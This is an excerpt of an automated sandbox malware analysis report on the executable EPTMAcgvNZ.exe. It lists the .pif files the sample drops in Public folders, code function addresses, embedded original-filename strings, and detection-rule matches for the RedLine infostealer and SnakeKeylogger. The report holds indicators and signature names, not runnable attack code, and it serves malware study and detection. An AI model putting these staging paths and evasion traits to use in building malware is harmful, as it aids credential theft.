            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A3EB316_2_003A3EB3
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003B769E16_2_003B769E
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A5A8616_2_003A5A86
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A4EC116_2_003A4EC1
            Source: C:\Users\Public\alpha.pifCode function: 16_2_00396B2016_2_00396B20
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A074016_2_003A0740
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A0BF016_2_003A0BF0
            Source: C:\Users\Public\alpha.pifCode function: 19_2_00394C1019_2_00394C10
            Source: C:\Users\Public\alpha.pifCode function: 19_2_0039540A19_2_0039540A
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A487519_2_003A4875
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003974B119_2_003974B1
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003B695A19_2_003B695A
            Source: C:\Users\Public\alpha.pifCode function: 19_2_0039914419_2_00399144
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003B419119_2_003B4191
            Source: C:\Users\Public\alpha.pifCode function: 19_2_00397A3419_2_00397A34
            Source: C:\Users\Public\alpha.pifCode function: 19_2_0039EE0319_2_0039EE03
            Source: C:\Users\Public\alpha.pifCode function: 19_2_0039D66019_2_0039D660
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003B3E6619_2_003B3E66
            Source: C:\Users\Public\alpha.pifCode function: 19_2_00396E5719_2_00396E57
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A3EB319_2_003A3EB3
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003B769E19_2_003B769E
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A5A8619_2_003A5A86
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A4EC119_2_003A4EC1
            Source: C:\Users\Public\alpha.pifCode function: 19_2_00396B2019_2_00396B20
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A074019_2_003A0740
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A0BF019_2_003A0BF0
            Source: C:\Users\Public\xpha.pifCode function: 20_2_00381E2620_2_00381E26
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AE20C421_2_02AE20C4
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AEC98E21_2_02AEC98E
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AEC9DE21_2_02AEC9DE
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_3_375165E523_3_375165E5
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_00408C6023_2_00408C60
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_0040DC1123_2_0040DC11
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_00407C3F23_2_00407C3F
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_00418CCC23_2_00418CCC
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_00406CA023_2_00406CA0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_004028B023_2_004028B0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_0041A4BE23_2_0041A4BE
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_0041824423_2_00418244
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_0040165023_2_00401650
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_00402F2023_2_00402F20
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_004193C423_2_004193C4
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_0041878823_2_00418788
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_00402F8923_2_00402F89
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_00402B9023_2_00402B90
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_004073A023_2_004073A0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_343D15B123_2_343D15B1
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_343D15C023_2_343D15C0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_343D132023_2_343D1320
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_36DBE66023_2_36DBE660
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_36DBC0F023_2_36DBC0F0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_36DB0A5723_2_36DB0A57
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_36DB0A6023_2_36DB0A60
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBDBA023_2_37FBDBA0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBA79823_2_37FBA798
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBE73023_2_37FBE730
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBB32823_2_37FBB328
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBF2C023_2_37FBF2C0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBBEB823_2_37FBBEB8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBCA4823_2_37FBCA48
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FB060823_2_37FB0608
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBD5D823_2_37FBD5D8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBA1D023_2_37FBA1D0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBE16823_2_37FBE168
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBAD6023_2_37FBAD60
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FB713823_2_37FB7138
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBECF823_2_37FBECF8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBB8F023_2_37FBB8F0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBF88823_2_37FBF888
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBC48023_2_37FBC480
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FB004023_2_37FB0040
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBD01023_2_37FBD010
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FB2C0823_2_37FB2C08
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FB2BF923_2_37FB2BF9
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBDB9123_2_37FBDB91
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBA78823_2_37FBA788
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FB678023_2_37FB6780
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FB677123_2_37FB6771
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBE72123_2_37FBE721
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBB31823_2_37FBB318
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBF2B023_2_37FBF2B0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBBEA823_2_37FBBEA8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBCA4623_2_37FBCA46
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FB05F723_2_37FB05F7
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBD5C823_2_37FBD5C8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBA1C023_2_37FBA1C0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBE15823_2_37FBE158
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBAD5023_2_37FBAD50
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBB8E123_2_37FBB8E1
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBF87823_2_37FBF878
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBC47623_2_37FBC476
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FB001123_2_37FB0011
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FBD00123_2_37FBD001
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD93F823_2_37FD93F8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD99E823_2_37FD99E8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD0BD023_2_37FD0BD0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD9FB823_2_37FD9FB8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD119823_2_37FD1198
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDA58023_2_37FDA580
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDD97023_2_37FDD970
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD176023_2_37FD1760
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDAB4823_2_37FDAB48
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDE74023_2_37FDE740
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD1D2823_2_37FD1D28
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD712023_2_37FD7120
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDB11023_2_37FDB110
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD771023_2_37FD7710
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDF51023_2_37FDF510
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDB6D823_2_37FDB6D8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD7CD823_2_37FD7CD8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD62B023_2_37FD62B0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDBCA023_2_37FDBCA0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD82A023_2_37FD82A0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD548023_2_37FD5480
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDD28023_2_37FDD280
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD886823_2_37FD8868
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDC26823_2_37FDC268
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDE05823_2_37FDE058
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD004023_2_37FD0040
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD8E3023_2_37FD8E30
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDEE2823_2_37FDEE28
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD060823_2_37FD0608
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD05F923_2_37FD05F9
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD93E923_2_37FD93E9
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD99D923_2_37FD99D9
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD9FA823_2_37FD9FA8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD459723_2_37FD4597
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD118E23_2_37FD118E
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDA57323_2_37FDA573
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDD96923_2_37FDD969
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD3B5A23_2_37FD3B5A
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD175623_2_37FD1756
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDAB3923_2_37FDAB39
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDE73023_2_37FDE730
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD1D2223_2_37FD1D22
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD711123_2_37FD7111
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDF50123_2_37FDF501
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDB10023_2_37FDB100
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD770323_2_37FD7703
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD7CCD23_2_37FD7CCD
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDB6C823_2_37FDB6C8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD62A623_2_37FD62A6
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD829023_2_37FD8290
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDBC9023_2_37FDBC90
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDD27123_2_37FDD271
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD547023_2_37FD5470
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDC25923_2_37FDC259
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD885923_2_37FD8859
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDE04823_2_37FDE048
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD463D23_2_37FD463D
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD502023_2_37FD5020
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD8E2023_2_37FD8E20
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FDEE1823_2_37FDEE18
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD501023_2_37FD5010
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_37FD000623_2_37FD0006
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381D996423_2_381D9964
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381D1DD823_2_381D1DD8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381D14F823_2_381D14F8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381D0E1023_2_381D0E10
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381D004023_2_381D0040
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381D072823_2_381D0728
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381D7CF823_2_381D7CF8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381D7CE823_2_381D7CE8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381D14E823_2_381D14E8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381D0E0023_2_381D0E00
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381D000623_2_381D0006
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381DA15823_2_381DA158
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_381D071823_2_381D0718
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_382CA90023_2_382CA900
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_382CB7B823_2_382CB7B8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_382C41D023_2_382C41D0
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BC20C424_2_02BC20C4
            Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\yihfsboC.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: String function: 0040D606 appears 48 times
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: String function: 0040E1D8 appears 88 times
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: String function: 02B146D4 appears 244 times
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: String function: 02B289D0 appears 45 times
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: String function: 02B2894C appears 56 times
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: String function: 02B144DC appears 74 times
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: String function: 02B14500 appears 33 times
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: String function: 02B14860 appears 949 times
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: String function: 02BD894C appears 50 times
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: String function: 02AE46D4 appears 155 times
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: String function: 02BC4860 appears 683 times
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: String function: 02AE4860 appears 683 times
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: String function: 02BC46D4 appears 155 times
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: String function: 02AF894C appears 50 times
            Source: EPTMAcgvNZ.exeBinary or memory string: OriginalFilename vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1355304078.0000000002375000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1351068324.00000000217FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1347686581.00000000217C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1351068324.000000002179D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1415066252.000000007FB20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1411922901.0000000021EF1000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1409907919.0000000021A70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1409907919.0000000021A70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1347686581.00000000217F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1252312705.000000007FCDF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 14.2.yihfsboC.pif.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 26.2.yihfsboC.pif.2b4c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2b4c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.2ae90f08.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2ae90f08.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.3.yihfsboC.pif.327be688.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.3.yihfsboC.pif.327be688.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.34860000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.34860000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.34860000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.34860000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.2ae90000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2ae90000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.25d6b98e.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.25d6b98e.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.29915570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.29915570.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.35955570.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.35955570.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
